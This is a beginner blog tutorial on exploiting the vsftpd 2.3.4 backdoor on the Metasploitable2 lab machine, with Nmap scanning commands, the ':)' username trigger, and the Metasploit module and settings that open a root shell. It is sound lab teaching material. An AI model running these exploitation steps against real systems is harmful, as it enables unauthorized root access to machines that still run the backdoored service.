DEV Community

Cover image for Exploiting vsftpd 2.3.4 on Metasploitable2 (Step-by-Step Guide for Beginners)
Alex Agyei
Alex Agyei

Posted on

Exploiting vsftpd 2.3.4 on Metasploitable2 (Step-by-Step Guide for Beginners)

#beginners #tutorial #cybersecurity #linux

One of the biggest turning points in learning cybersecurity is understanding how attackers move from:

Discovery β†’ Exploitation β†’ Access

In a training session I led, students went from running a simple scan to gaining root access on a vulnerable machine. The excitement was great β€” but the real value was understanding how and why it worked.

In this guide, you'll replicate that exact process step by step.

What You’ll Learn

  • How to scan a target using Nmap
  • How to identify vulnerable services
  • How the vsftpd 2.3.4 backdoor works
  • How to exploit it using Metasploit
  • How to gain root access

Prerequisites

Make sure your lab is ready:

  • Kali Linux (attacker)

Kali

  • Metasploitable2 (target)

Metaspoitable

  • Both machines on the same network (NAT or Host-only)

Step 1: Get the Target IP

On Metasploitable2:

ifconfig

Ipadrr

Look for something like:

192.168.56.101

Step 2: Scan with Nmap

On Kali:

nmap -sV target_ip

nmapp

Why -sV matters

Detects service versions
Helps you find known vulnerabilities

Key Result
21/tcp open ftp vsftpd 2.3.4

πŸ‘‰ This is your entry point.

Step 3: Understand the Vulnerability

vsftpd 2.3.4 contains a backdoor.

Trigger condition:
Login using a username ending with:
:)
What happens:
A shell opens on port 6200

This is intentionally vulnerable β€” perfect for learning exploitation.

Step 4: Start Metasploit on kali

msfconsole

msfc

Step 5: Find the Exploit

search vsftpd

search

Expected result:
exploit/unix/ftp/vsftpd_234_backdoor

Step 6: Load the Exploit

use exploit/unix/ftp/vsftpd_234_backdoor

used

Step 7: Set Target IP

set RHOST target_ip

rhost

Step 8: Run the Exploit

run

runn
If successful:

Command shell session 1 opened

Step 9: Confirm Access

whoami

outt

Output:

root

πŸŽ‰ You now have root access.

Key Concepts (Simple Breakdown)

Reconnaissance
Finding open ports and services
Example tool: Nmap

Enumeration
Identifying versions and weaknesses
This is where real attack paths appear

Exploitation
Using a vulnerability to gain access
In this case: a built-in backdoor

Metasploit
A framework that automates exploitation
Saves time and standardizes attacks

Common Beginner Mistakes

  1. Skipping Version Detection

Wrong:

nmap target_ip

Correct:

nmap -sV target_ip

  1. Using the Wrong IP Mixing attacker and target IP Using 127.0.0.1 incorrectly

βœ” Always verify:

ifconfig

  1. Network Misconfiguration

If nothing works:

Check both VMs are on the same network

  1. Forgetting RHOST
    set RHOST target_ip

  2. Blindly Running Exploits

Don’t just run tools β€” ask:

Why does this vulnerability exist?
What triggered it?
How would this look in a real system?
Pro Tips
Run deeper scans
nmap -A target_ip
Think like a professional

Use a workflow:

Scan
Identify
Research
Exploit
Validate
Conclusion

This lab shows a complete beginner-friendly attack chain:

Discover a service
Identify its version
Find a vulnerability
Exploit it
Gain access

Even though this is a deliberately vulnerable system, the process is exactly how real penetration testing works.

The goal is not just to hack β€” but to understand.

Next Steps
Repeat this lab without guidance
Document it on GitHub (build your portfolio)
Try another vulnerable service on Metasploitable2
Final Note

If you're learning cybersecurity:

Stay consistent.
Stay curious.
Keep building.

Follow for more hands-on cybersecurity labs and real-world breakdowns.

Top comments (0)